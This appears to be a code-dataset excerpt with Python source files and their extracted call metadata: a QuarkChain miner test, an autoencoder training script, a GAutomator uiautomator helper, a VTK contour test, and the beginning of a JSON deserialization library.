| [((3, 0, 3, 23), 'pyb.CAN.initfilterbanks', 'CAN.initfilterbanks', ({(3, 20, 3, 22): '(14)'}, {}), '(14)', False, 'from pyb import CAN\n'), ((4, 6, 4, 12), 'pyb.CAN', 'CAN', ({(4, 10, 4, 11): '1'}, {}), '(1)', False, 'from pyb import CAN\n'), ((35, 6, 35, 43), 'pyb.CAN', 'CAN', (), '', False, 'from pyb import CAN\n'), ((55, 6, 55, 26), 'pyb.CAN', 'CAN', ({(55, 10, 55, 11): '1', (55, 13, 55, 25): 'CAN.LOOPBACK'}, {}), '(1, CAN.LOOPBACK)', False, 'from pyb import CAN\n')] |
TahiG/pyquarkchain | quarkchain/cluster/tests/test_miner.py | 30da626ef6b50bd07b230aac05a3cef7fd7f23cf | import asyncio
import time
import unittest
from typing import Optional
from quarkchain.cluster.miner import DoubleSHA256, Miner, MiningWork, validate_seal
from quarkchain.config import ConsensusType
from quarkchain.core import RootBlock, RootBlockHeader
from quarkchain.p2p import ecies
from quarkchain.utils import sha3_256
class TestMiner(unittest.TestCase):
def setUp(self):
super().setUp()
def miner_gen(consensus, create_func, add_func, **kwargs):
m = Miner(
consensus, create_func, add_func, self.get_mining_params, **kwargs
)
m.enabled = True
return m
self.miner_gen = miner_gen
self.added_blocks = []
@staticmethod
def get_mining_params(rounds: Optional[int] = None):
# guarantee target time is hit
ret = {"target_block_time": 0.0, "is_test": True}
if rounds is not None:
ret["rounds"] = rounds
return ret
def test_mine_new_block_normal_case(self):
async def create(retry=True):
if len(self.added_blocks) >= 5:
return None # stop the game
return RootBlock(
RootBlockHeader(create_time=int(time.time())),
tracking_data="{}".encode("utf-8"),
)
async def add(block):
nonlocal miner
self.added_blocks.append(block)
for consensus in (
ConsensusType.POW_SIMULATE,
ConsensusType.POW_ETHASH,
ConsensusType.POW_SHA3SHA3,
):
miner = self.miner_gen(consensus, create, add)
# should generate 5 blocks and then end
loop = asyncio.get_event_loop()
loop.run_until_complete(miner._mine_new_block_async())
self.assertEqual(len(self.added_blocks), 5)
def test_simulate_mine_handle_block_exception(self):
i = 0
async def create(retry=True):
nonlocal i
if i >= 5:
return None
return RootBlock(
RootBlockHeader(create_time=int(time.time())),
tracking_data="{}".encode("utf-8"),
)
async def add(block):
nonlocal i, miner
try:
if i % 2 == 0:
raise Exception("(╯°□°)╯︵ ┻━┻")
else:
self.added_blocks.append(block)
finally:
i += 1
miner = self.miner_gen(ConsensusType.POW_SIMULATE, create, add)
# only 2 blocks can be added
loop = asyncio.get_event_loop()
loop.run_until_complete(miner._mine_new_block_async())
self.assertEqual(len(self.added_blocks), 2)
def test_sha3sha3(self):
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, None, None)
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=5),
tracking_data="{}".encode("utf-8"),
)
work = MiningWork(block.header.get_hash_for_mining(), 42, 5)
# only process one block, which is passed in. `None` means termination right after
miner.input_q.put((None, {}))
miner.mine_loop(
work,
{"consensus_type": ConsensusType.POW_SHA3SHA3},
miner.input_q,
miner.output_q,
)
mined_res = miner.output_q.get()
block.header.nonce = mined_res.nonce
validate_seal(block.header, ConsensusType.POW_SHA3SHA3)
def test_qkchash(self):
miner = self.miner_gen(ConsensusType.POW_QKCHASH, None, None)
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=5),
tracking_data="{}".encode("utf-8"),
)
work = MiningWork(block.header.get_hash_for_mining(), 42, 5)
# only process one block, which is passed in. `None` means termination right after
miner.input_q.put((None, {}))
miner.mine_loop(
work,
{"consensus_type": ConsensusType.POW_QKCHASH},
miner.input_q,
miner.output_q,
)
mined_res = miner.output_q.get()
block.header.nonce = mined_res.nonce
block.header.mixhash = mined_res.mixhash
validate_seal(block.header, ConsensusType.POW_QKCHASH)
def test_only_remote(self):
async def go():
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, None, None)
with self.assertRaises(ValueError):
await miner.get_work()
with self.assertRaises(ValueError):
await miner.submit_work(b"", 42, b"")
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_get_work(self):
now = 42
async def create(retry=True):
nonlocal now
return RootBlock(RootBlockHeader(create_time=now, extra_data=b"{}"))
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, create, None, remote=True)
async def go():
nonlocal now
# no current work, will generate a new one
work = await miner.get_work(now=now)
self.assertEqual(len(work), 3)
self.assertEqual(len(miner.work_map), 1)
h = list(miner.work_map.keys())[0]
self.assertEqual(work.hash, h)
# cache hit
now += 1
work = await miner.get_work(now=now)
self.assertEqual(work.hash, h)
self.assertEqual(len(miner.work_map), 1)
# new work if interval passed
now += 10
work = await miner.get_work(now=now)
self.assertEqual(len(miner.work_map), 2)
self.assertNotEqual(work.hash, h)
# work map cleaned up if too much time passed
now += 100
await miner.get_work(now=now)
self.assertEqual(len(miner.work_map), 1) # only new work itself
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_submit_work(self):
now = 42
block = RootBlock(
RootBlockHeader(create_time=42, extra_data=b"{}", difficulty=5)
)
async def create(retry=True):
return block
async def add(block_to_add):
self.added_blocks.append(block_to_add)
miner = self.miner_gen(ConsensusType.POW_SHA3SHA3, create, add, remote=True)
async def go():
work = await miner.get_work(now=now)
self.assertEqual(work.height, 0)
self.assertEqual(work.difficulty, 5)
# submitted block doesn't exist
res = await miner.submit_work(b"lolwut", 0, sha3_256(b""))
self.assertFalse(res)
solver = DoubleSHA256(work)
sol = solver.mine(100, 200).nonce
self.assertGreater(sol, 100) # ensure non-solution is tried
non_sol = sol - 1
# invalid pow proof
res = await miner.submit_work(work.hash, non_sol, sha3_256(b""))
self.assertFalse(res)
# valid submission, also check internal state afterwards
res = await miner.submit_work(work.hash, sol, sha3_256(b""))
self.assertTrue(res)
self.assertEqual(miner.work_map, {})
self.assertEqual(len(self.added_blocks), 1)
self.assertIsNone(miner.current_work)
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_submit_work_with_guardian(self):
now = 42
block = RootBlock(
RootBlockHeader(create_time=42, extra_data=b"{}", difficulty=1000)
)
async def create(retry=True):
return block
async def add(_):
pass
miner = self.miner_gen(
ConsensusType.POW_SHA3SHA3,
create,
add,
remote=True,
# fake pk, will succeed in test but fail in real world when
# adding the block to the root chain
guardian_private_key=ecies.generate_privkey(),
)
async def go():
for i in range(42, 100):
work = await miner.get_work(now=now)
self.assertEqual(work.height, 0)
# guardian: diff 1000 -> 1, any number should work
res = await miner.submit_work(work.hash, i, sha3_256(b""))
self.assertTrue(res)
loop = asyncio.get_event_loop()
loop.run_until_complete(go())
def test_validate_seal_with_adjusted_diff(self):
diff = 1000
block = RootBlock(
RootBlockHeader(create_time=42, difficulty=diff),
tracking_data="{}".encode("utf-8"),
)
block.header.nonce = 0
with self.assertRaises(ValueError):
validate_seal(block.header, ConsensusType.POW_SHA3SHA3)
# significantly lowering the diff should pass
validate_seal(block.header, ConsensusType.POW_SHA3SHA3, adjusted_diff=1)
| [((83, 15, 83, 39), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ({}, {}), '()', False, 'import asyncio\n'), ((104, 8, 104, 63), 'quarkchain.cluster.miner.validate_seal', 'validate_seal', ({(104, 22, 104, 34): 'block.header', (104, 36, 104, 62): 'ConsensusType.POW_SHA3SHA3'}, {}), '(block.header, ConsensusType.POW_SHA3SHA3)', False, 'from quarkchain.cluster.miner import DoubleSHA256, Miner, MiningWork, validate_seal\n'), ((124, 8, 124, 62), 'quarkchain.cluster.miner.validate_seal', 'validate_seal', ({(124, 22, 124, 34): 'block.header', (124, 36, 124, 61): 'ConsensusType.POW_QKCHASH'}, {}), '(block.header, ConsensusType.POW_QKCHASH)', False, 'from quarkchain.cluster.miner import DoubleSHA256, Miner, MiningWork, validate_seal\n'), ((134, 15, 134, 39), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ({}, {}), '()', False, 'import asyncio\n'), ((169, 15, 169, 39), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ({}, {}), '()', False, 'import asyncio\n'), ((208, 15, 208, 39), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ({}, {}), '()', False, 'import asyncio\n'), ((242, 15, 242, 39), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ({}, {}), '()', False, 'import asyncio\n'), ((256, 8, 256, 80), 'quarkchain.cluster.miner.validate_seal', 'validate_seal', (), '', False, 'from quarkchain.cluster.miner import DoubleSHA256, Miner, MiningWork, validate_seal\n'), ((18, 16, 20, 13), 'quarkchain.cluster.miner.Miner', 'Miner', ({(19, 16, 19, 25): 'consensus', (19, 27, 19, 38): 'create_func', (19, 40, 19, 48): 'add_func', (19, 50, 19, 72): 'self.get_mining_params'}, {}), '(consensus, create_func, add_func, self.get_mining_params, **kwargs)', False, 'from quarkchain.cluster.miner import DoubleSHA256, Miner, MiningWork, validate_seal\n'), ((55, 19, 55, 43), 'asyncio.get_event_loop', 'asyncio.get_event_loop', ({}, {}), '()', False, 'import asyncio\n'), ((90, 12, 90, 57), 'quarkchain.core.RootBlockHeader', 'RootBlockHeader', (), '', False, 'from quarkchain.core import RootBlock, RootBlockHeader\n'), ((109, 12, 109, 57), 'quarkchain.core.RootBlockHeader', 'RootBlockHeader', (), '', False, 'from quarkchain.core import RootBlock, RootBlockHeader\n'), ((175, 12, 175, 75), 'quarkchain.core.RootBlockHeader', 'RootBlockHeader', (), '', False, 'from quarkchain.core import RootBlock, RootBlockHeader\n'), ((194, 21, 194, 39), 'quarkchain.cluster.miner.DoubleSHA256', 'DoubleSHA256', ({(194, 34, 194, 38): 'work'}, {}), '(work)', False, 'from quarkchain.cluster.miner import DoubleSHA256, Miner, MiningWork, validate_seal\n'), ((214, 12, 214, 78), 'quarkchain.core.RootBlockHeader', 'RootBlockHeader', (), '', False, 'from quarkchain.core import RootBlock, RootBlockHeader\n'), ((248, 12, 248, 60), 'quarkchain.core.RootBlockHeader', 'RootBlockHeader', (), '', False, 'from quarkchain.core import RootBlock, RootBlockHeader\n'), ((253, 12, 253, 67), 'quarkchain.cluster.miner.validate_seal', 'validate_seal', ({(253, 26, 253, 38): 'block.header', (253, 40, 253, 66): 'ConsensusType.POW_SHA3SHA3'}, {}), '(block.header, ConsensusType.POW_SHA3SHA3)', False, 'from quarkchain.cluster.miner import DoubleSHA256, Miner, MiningWork, validate_seal\n'), ((142, 29, 142, 79), 'quarkchain.core.RootBlockHeader', 'RootBlockHeader', (), '', False, 'from quarkchain.core import RootBlock, RootBlockHeader\n'), ((230, 33, 230, 57), 'quarkchain.p2p.ecies.generate_privkey', 'ecies.generate_privkey', ({}, {}), '()', False, 'from quarkchain.p2p import ecies\n'), ((191, 56, 191, 69), 'quarkchain.utils.sha3_256', 'sha3_256', ({(191, 65, 191, 68): "b''"}, {}), "(b'')", False, 'from quarkchain.utils import sha3_256\n'), ((199, 62, 199, 75), 'quarkchain.utils.sha3_256', 'sha3_256', ({(199, 71, 199, 74): "b''"}, {}), "(b'')", False, 'from quarkchain.utils import sha3_256\n'), ((202, 58, 202, 71), 'quarkchain.utils.sha3_256', 'sha3_256', ({(202, 67, 202, 70): "b''"}, {}), "(b'')", False, 'from quarkchain.utils import sha3_256\n'), ((239, 60, 239, 73), 'quarkchain.utils.sha3_256', 'sha3_256', ({(239, 69, 239, 72): "b''"}, {}), "(b'')", False, 'from quarkchain.utils import sha3_256\n'), ((40, 48, 40, 59), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((67, 48, 67, 59), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
nriesterer/iccm-neural-bound | analysis/networks/autoencoder/train_eval.py | e14b103ba2c81a197de5b0edf948c19d57f0d3ba | """ Evaluates the training performance of the autoencoder.
"""
import time
import pandas as pd
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
import ccobra
import onehot
import autoencoder
# General settings
training_datafile = '../../data/Ragni-train.csv'
test_datafile = '../../data/Ragni-test.csv'
n_epochs = 150
batch_size = 16
net = autoencoder.DenoisingAutoencoder()
criterion = nn.MSELoss()
optimizer = optim.Adam(net.parameters())
def csv_to_tensor(datafile):
profiles = []
response_dicts = []
task_sequences = []
df = pd.read_csv(datafile)
for _, subj_df in df.groupby('id'):
# Obtain the task-response mapping for all syllogisms
response_dict = {}
task_sequence = []
for _, task_series in subj_df.sort_values('sequence').iterrows():
item = ccobra.Item(
task_series['id'], task_series['domain'], task_series['task'],
task_series['response_type'], task_series['choices'], task_series['sequence'])
syllogism = ccobra.syllogistic.Syllogism(item)
response_dict[syllogism.encoded_task] = syllogism.encode_response(
task_series['response'].split(';'))
task_sequence.append(syllogism.encoded_task)
# Convert the task-response mapping to the reasoner profile
profile = []
for task in ccobra.syllogistic.SYLLOGISMS:
profile.append(onehot.onehot_response(response_dict[task]))
profiles.append(profile)
response_dicts.append(response_dict)
task_sequences.append(task_sequence)
profile_tensor = torch.tensor(profiles).float().view(-1, 576)
return profile_tensor, np.array(response_dicts), np.array(task_sequences)
# Construct the training and test tensors
train_data, train_resp_dicts, train_seqs = csv_to_tensor(training_datafile)
test_data, test_resp_dicts, test_seqs = csv_to_tensor(test_datafile)
def compute_accuracy(data, resp_dicts, seqs):
accs = []
for subj_idx in range(len(data)):
subj_resp_dict = resp_dicts[subj_idx]
subj_seq = seqs[subj_idx]
profile_tensor = torch.zeros((576)).float()
subj_hits = []
for task in subj_seq:
task_idx = ccobra.syllogistic.SYLLOGISMS.index(task)
start = task_idx * 9
end = start + 9
truth = subj_resp_dict[task]
# Query the network for a prediction
prediction_idx = net(profile_tensor)[start:end].argmax()
prediction = ccobra.syllogistic.RESPONSES[prediction_idx]
subj_hits.append(prediction == truth)
# Add the true response to the profile
profile_tensor[start:end] = torch.from_numpy(onehot.onehot_response(truth))
accs.append(subj_hits)
return accs
# Training loop
train_accs = []
test_accs = []
losses = []
for epoch in range(n_epochs):
start_time = time.time()
# Permute the training data
rnd_idxs = np.random.permutation(np.arange(len(train_data)))
train_data = train_data[rnd_idxs]
train_resp_dicts = train_resp_dicts[rnd_idxs]
train_seqs = train_seqs[rnd_idxs]
batch_losses = []
for batch_idx in range(len(train_data) // batch_size):
# Obtain the batch data
start = batch_idx * batch_size
end = start + batch_size
batch_data = train_data[start:end]
input_data = batch_data
# Augment the input data by adding noise
noise = torch.bernoulli(torch.zeros_like(input_data) + 0.8)
input_data = input_data * noise
# Perform the training
outputs = net(input_data)
loss = criterion(outputs, batch_data)
optimizer.zero_grad()
loss.backward()
optimizer.step()
batch_losses.append(loss.item())
losses.append(np.mean(batch_losses))
# Compute the accuracies for evaluation
net.eval()
# Compute the overall accuracy on the training dataset
train_acc = compute_accuracy(train_data, train_resp_dicts, train_seqs)
test_acc = compute_accuracy(test_data, test_resp_dicts, test_seqs)
# Diagnostig output
print('Epoch {}/{} ({:.2f}s): {}'.format(
epoch + 1, n_epochs, time.time() - start_time, np.mean(batch_losses)))
print(' train acc: {:.4f} ({:.4f})'.format(np.mean(train_acc), np.std(train_acc)))
print(' test acc : {:.4f} ({:.4f})'.format(np.mean(test_acc), np.std(test_acc)))
# Store the accuracy results
train_accs.append(train_acc)
test_accs.append(test_acc)
# Write the accuracies to disk
print('Writing the results to disk...')
np.save('train_accs.npy', np.array(train_accs))
np.save('test_accs.npy', np.array(test_accs))
np.save('train_losses.npy', np.array(losses))
| [((24, 6, 24, 40), 'autoencoder.DenoisingAutoencoder', 'autoencoder.DenoisingAutoencoder', ({}, {}), '()', False, 'import autoencoder\n'), ((25, 12, 25, 24), 'torch.nn.MSELoss', 'nn.MSELoss', ({}, {}), '()', True, 'import torch.nn as nn\n'), ((33, 9, 33, 30), 'pandas.read_csv', 'pd.read_csv', ({(33, 21, 33, 29): 'datafile'}, {}), '(datafile)', True, 'import pandas as pd\n'), ((95, 17, 95, 28), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((145, 26, 145, 46), 'numpy.array', 'np.array', ({(145, 35, 145, 45): 'train_accs'}, {}), '(train_accs)', True, 'import numpy as np\n'), ((146, 25, 146, 44), 'numpy.array', 'np.array', ({(146, 34, 146, 43): 'test_accs'}, {}), '(test_accs)', True, 'import numpy as np\n'), ((147, 28, 147, 44), 'numpy.array', 'np.array', ({(147, 37, 147, 43): 'losses'}, {}), '(losses)', True, 'import numpy as np\n'), ((58, 27, 58, 51), 'numpy.array', 'np.array', ({(58, 36, 58, 50): 'response_dicts'}, {}), '(response_dicts)', True, 'import numpy as np\n'), ((58, 53, 58, 77), 'numpy.array', 'np.array', ({(58, 62, 58, 76): 'task_sequences'}, {}), '(task_sequences)', True, 'import numpy as np\n'), ((124, 18, 124, 39), 'numpy.mean', 'np.mean', ({(124, 26, 124, 38): 'batch_losses'}, {}), '(batch_losses)', True, 'import numpy as np\n'), ((39, 19, 41, 94), 'ccobra.Item', 'ccobra.Item', ({(40, 16, 40, 33): "task_series['id']", (40, 35, 40, 56): "task_series['domain']", (40, 58, 40, 77): "task_series['task']", (41, 16, 41, 44): "task_series['response_type']", (41, 46, 41, 68): "task_series['choices']", (41, 70, 41, 93): "task_series['sequence']"}, {}), "(task_series['id'], task_series['domain'], task_series['task'],\n task_series['response_type'], task_series['choices'], task_series[\n 'sequence'])", False, 'import ccobra\n'), ((42, 24, 42, 58), 'ccobra.syllogistic.Syllogism', 'ccobra.syllogistic.Syllogism', ({(42, 53, 42, 57): 'item'}, {}), '(item)', False, 'import ccobra\n'), ((74, 23, 74, 64), 'ccobra.syllogistic.SYLLOGISMS.index', 'ccobra.syllogistic.SYLLOGISMS.index', ({(74, 59, 74, 63): 'task'}, {}), '(task)', False, 'import ccobra\n'), ((135, 55, 135, 76), 'numpy.mean', 'np.mean', ({(135, 63, 135, 75): 'batch_losses'}, {}), '(batch_losses)', True, 'import numpy as np\n'), ((136, 49, 136, 67), 'numpy.mean', 'np.mean', ({(136, 57, 136, 66): 'train_acc'}, {}), '(train_acc)', True, 'import numpy as np\n'), ((136, 69, 136, 86), 'numpy.std', 'np.std', ({(136, 76, 136, 85): 'train_acc'}, {}), '(train_acc)', True, 'import numpy as np\n'), ((137, 49, 137, 66), 'numpy.mean', 'np.mean', ({(137, 57, 137, 65): 'test_acc'}, {}), '(test_acc)', True, 'import numpy as np\n'), ((137, 68, 137, 84), 'numpy.std', 'np.std', ({(137, 75, 137, 83): 'test_acc'}, {}), '(test_acc)', True, 'import numpy as np\n'), ((51, 27, 51, 70), 'onehot.onehot_response', 'onehot.onehot_response', ({(51, 50, 51, 69): 'response_dict[task]'}, {}), '(response_dict[task])', False, 'import onehot\n'), ((70, 25, 70, 43), 'torch.zeros', 'torch.zeros', ({(70, 38, 70, 41): '576'}, {}), '(576)', False, 'import torch\n'), ((85, 57, 85, 86), 'onehot.onehot_response', 'onehot.onehot_response', ({(85, 80, 85, 85): 'truth'}, {}), '(truth)', False, 'import onehot\n'), ((112, 32, 112, 60), 'torch.zeros_like', 'torch.zeros_like', ({(112, 49, 112, 59): 'input_data'}, {}), '(input_data)', False, 'import torch\n'), ((135, 29, 135, 40), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((57, 21, 57, 43), 'torch.tensor', 'torch.tensor', ({(57, 34, 57, 42): 'profiles'}, {}), '(profiles)', False, 'import torch\n')] |
Aver58/ColaFrameWork | Tools/GAutomator/wpyscripts/uiautomator/uiautomator_manager.py | 04c6750305ad734b30eceb95b463695b8373845a | #-*- coding: UTF-8 -*-
"""
Tencent is pleased to support the open source community by making GAutomator available.
Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
"""
__author__ = 'minhuaxu [email protected]'
import time
import os
import logging
from libs.uiauto.uiautomator import AutomatorDevice
from wpyscripts.common.adb_process import AdbTool
logger=logging.getLogger("wetest")
_device_port=9008
_uiautomator_port = os.environ.get("UIAUTOMATOR_PORT","19008")
def _init_uiautomator():
"""
初始化uiautomator
:return:
"""
file_path = os.path.split(os.path.realpath(__file__))[0]
uiautomator_stub_path = os.path.abspath(
os.path.join(file_path, "..","third","libs","uiAutomator","uiautomator-stub.jar"))
adb=AdbTool()
print(adb.cmd_wait("push",uiautomator_stub_path,"/data/local/tmp"))
logger.debug("Start UIAutomator")
uiautomator_process=adb.cmd("shell","uiautomator","runtest","uiautomator-stub.jar","-c","com.github.uiautomatorstub.Stub")
time.sleep(3)
logger.debug("Exit uiautomator")
adb.forward(_uiautomator_port,_device_port)
def _init():
port = os.environ.get("UIAUTOMATORPORT")
if port:
return int(port)
else:
"""
本地,初始化UiAutomator
"""
_init_uiautomator()
return int(_uiautomator_port)
def get_uiautomator():
if get_uiautomator.instance:
return get_uiautomator.instance
else:
port=_init()
get_uiautomator.instance = AutomatorDevice(None, port, os.environ.get("PLATFORM_IP", "127.0.0.1"), None)
return get_uiautomator.instance
get_uiautomator.instance=None
| [((18, 7, 18, 34), 'logging.getLogger', 'logging.getLogger', ({(18, 25, 18, 33): '"""wetest"""'}, {}), "('wetest')", False, 'import logging\n'), ((21, 20, 21, 62), 'os.environ.get', 'os.environ.get', ({(21, 35, 21, 53): '"""UIAUTOMATOR_PORT"""', (21, 54, 21, 61): '"""19008"""'}, {}), "('UIAUTOMATOR_PORT', '19008')", False, 'import os\n'), ((31, 8, 31, 17), 'wpyscripts.common.adb_process.AdbTool', 'AdbTool', ({}, {}), '()', False, 'from wpyscripts.common.adb_process import AdbTool\n'), ((36, 4, 36, 17), 'time.sleep', 'time.sleep', ({(36, 15, 36, 16): '(3)'}, {}), '(3)', False, 'import time\n'), ((42, 11, 42, 44), 'os.environ.get', 'os.environ.get', ({(42, 26, 42, 43): '"""UIAUTOMATORPORT"""'}, {}), "('UIAUTOMATORPORT')", False, 'import os\n'), ((30, 8, 30, 89), 'os.path.join', 'os.path.join', ({(30, 21, 30, 30): 'file_path', (30, 32, 30, 36): '""".."""', (30, 37, 30, 44): '"""third"""', (30, 45, 30, 51): '"""libs"""', (30, 52, 30, 65): '"""uiAutomator"""', (30, 66, 30, 88): '"""uiautomator-stub.jar"""'}, {}), "(file_path, '..', 'third', 'libs', 'uiAutomator',\n 'uiautomator-stub.jar')", False, 'import os\n'), ((28, 30, 28, 56), 'os.path.realpath', 'os.path.realpath', ({(28, 47, 28, 55): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((58, 63, 58, 105), 'os.environ.get', 'os.environ.get', ({(58, 78, 58, 91): '"""PLATFORM_IP"""', (58, 93, 58, 104): '"""127.0.0.1"""'}, {}), "('PLATFORM_IP', '127.0.0.1')", False, 'import os\n')] |
timkrentz/SunTracker | IMU/VTK-6.2.0/Filters/Core/Testing/Python/TestSynchronizedTemplates3D.py | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | #!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class TestSynchronizedTemplates3D(Testing.vtkTest):
def testAll(self):
reader = vtk.vtkImageReader()
reader.SetDataByteOrderToLittleEndian()
reader.SetDataExtent(0,63,0,63,1,93)
reader.SetDataSpacing(3.2,3.2,1.5)
reader.SetFilePrefix("" + str(VTK_DATA_ROOT) + "/Data/headsq/quarter")
reader.SetDataMask(0x7fff)
# write isosurface to file
#vtkSynchronizedTemplates3D stemp
stemp = vtk.vtkContourFilter()
stemp.SetInputConnection(reader.GetOutputPort())
stemp.SetValue(0,1150)
stemp.GenerateTrianglesOff()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),38380)
stemp.GenerateTrianglesOn()
stemp.Update()
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfPoints(),39315)
self.failUnlessEqual(stemp.GetOutputDataObject(0).GetNumberOfCells(),78268)
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(stemp.GetOutputPort())
mapper.ScalarVisibilityOff()
head = vtk.vtkActor()
head.SetMapper(mapper)
head.GetProperty().SetColor(1,0.7,0.6)
# Create the RenderWindow, Renderer and Interactor
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(head)
ren1.SetBackground(1,1,1)
renWin.SetSize(400,400)
ren1.SetBackground(0.5,0.5,0.6)
ren1.GetActiveCamera().SetPosition(99.8847,537.926,15)
ren1.GetActiveCamera().SetFocalPoint(99.8847,109.81,15)
ren1.GetActiveCamera().SetViewAngle(20)
ren1.GetActiveCamera().SetViewUp(0,0,-1)
ren1.ResetCameraClippingRange()
# render the image
#
renWin.Render()
# prevent the tk window from showing up then start the event loop
# --- end of script --
if __name__ == "__main__":
Testing.main([(TestSynchronizedTemplates3D, 'test')])
| [((5, 16, 5, 32), 'vtk.util.misc.vtkGetDataRoot', 'vtkGetDataRoot', ({}, {}), '()', False, 'from vtk.util.misc import vtkGetDataRoot\n'), ((62, 2, 62, 55), 'vtk.test.Testing.main', 'Testing.main', ({(62, 15, 62, 54): "[(TestSynchronizedTemplates3D, 'test')]"}, {}), "([(TestSynchronizedTemplates3D, 'test')])", False, 'from vtk.test import Testing\n'), ((9, 13, 9, 33), 'vtk.vtkImageReader', 'vtk.vtkImageReader', ({}, {}), '()', False, 'import vtk\n'), ((17, 12, 17, 34), 'vtk.vtkContourFilter', 'vtk.vtkContourFilter', ({}, {}), '()', False, 'import vtk\n'), ((31, 13, 31, 36), 'vtk.vtkPolyDataMapper', 'vtk.vtkPolyDataMapper', ({}, {}), '()', False, 'import vtk\n'), ((34, 11, 34, 25), 'vtk.vtkActor', 'vtk.vtkActor', ({}, {}), '()', False, 'import vtk\n'), ((39, 11, 39, 28), 'vtk.vtkRenderer', 'vtk.vtkRenderer', ({}, {}), '()', False, 'import vtk\n'), ((40, 13, 40, 34), 'vtk.vtkRenderWindow', 'vtk.vtkRenderWindow', ({}, {}), '()', False, 'import vtk\n'), ((42, 11, 42, 42), 'vtk.vtkRenderWindowInteractor', 'vtk.vtkRenderWindowInteractor', ({}, {}), '()', False, 'import vtk\n')] |
iAndriy/deserialize | deserialize/__init__.py | 3552517873d68d3bb953b44dd9512f0e0d045191 | """A module for deserializing data to Python objects."""
# pylint: disable=unidiomatic-typecheck
# pylint: disable=protected-access
# pylint: disable=too-many-branches
# pylint: disable=wildcard-import
import enum
import functools
import typing
from typing import Any, Callable, Dict, List, Optional, Union
from deserialize.conversions import camel_case, pascal_case
from deserialize.decorators import constructed, _call_constructed
from deserialize.decorators import default, _get_default, _has_default
from deserialize.decorators import (
downcast_field,
_get_downcast_field,
downcast_identifier,
_get_downcast_class,
allow_downcast_fallback,
_allows_downcast_fallback,
)
from deserialize.decorators import ignore, _should_ignore
from deserialize.decorators import key, _get_key
from deserialize.decorators import parser, _get_parser
from deserialize.decorators import auto_snake, _uses_auto_snake
from deserialize.decorators import allow_unhandled, _should_allow_unhandled
from deserialize.exceptions import (
DeserializeException,
InvalidBaseTypeException,
NoDefaultSpecifiedException,
UndefinedDowncastException,
UnhandledFieldException,
)
from deserialize.type_checks import *
class RawStorageMode(enum.Enum):
"""The storage mode for the raw data on each object.
If a store mode is set, the data will be stored in the attribute named:
`__deserialize_raw__`
"""
# Do not store the raw data at all
none = "none"
# Only store the data on the root node
root = "root"
# Store on all objects (WARNING: This can use a significant amount of memory)
all = "all"
def child_mode(self) -> "RawStorageMode":
"""Determine the mode for child parsing.
When we move to the next child iteration, we need to change mode
in some cases. For instance, if we only store the root node, then we
need to set all the children to not be stored.
:raises Exception: If we get an unexpected storage mode
:returns: The child raw storage mode
"""
if self == RawStorageMode.none:
return RawStorageMode.none
if self == RawStorageMode.root:
return RawStorageMode.none
if self == RawStorageMode.all:
return RawStorageMode.all
raise DeserializeException(f"Unexpected raw storage mode: {self}")
# pylint: disable=function-redefined
def deserialize(class_reference, data, *, throw_on_unhandled: bool = False, raw_storage_mode: RawStorageMode = RawStorageMode.none): # type: ignore
"""Deserialize data to a Python object."""
if not isinstance(data, dict) and not isinstance(data, list):
raise InvalidBaseTypeException(
"Only lists and dictionaries are supported as base raw data types"
)
if hasattr(class_reference, "__name__"):
name = class_reference.__name__
else:
name = str(class_reference)
return _deserialize(
class_reference,
data,
name,
throw_on_unhandled=throw_on_unhandled,
raw_storage_mode=raw_storage_mode,
)
# pylint: enable=function-redefined
# pylint:disable=too-many-return-statements
def _deserialize(
class_reference, data, debug_name, *, throw_on_unhandled: bool, raw_storage_mode: RawStorageMode
):
"""Deserialize data to a Python object, but allow base types"""
# In here we try and use some "heuristics" to deserialize. We have 2 main
# options to do this. For the first, we can take the expected type and try
# and deserialize the data to that and show any errors. The other option is
# to take the data, and try and determine the types and deserialize that
# way. We do a mix of both.
#
# For example, we check if we have an any type or None type first and return
# early, since we can't deserialize directly to those (since that doesn't
# make any sense). But then later, we can't go for a list directly to a
# type, so we have to go through each item in the data, and iterate.
#
# This produces quite a complex interweaving of operations. The general
# approach I've found to work is to try and do specific type checks first,
# then handle collection data, then any other types afterwards. That's not
# set in stone though.
def finalize(value: Optional[Any]) -> Optional[Any]:
"""Run through any finalization steps before returning the value."""
# Set raw data where applicable
if raw_storage_mode in [RawStorageMode.root, RawStorageMode.all]:
# We can't set attributes on primitive types
if hasattr(value, "__dict__"):
setattr(value, "__deserialize_raw__", data)
return value
if class_reference == Any:
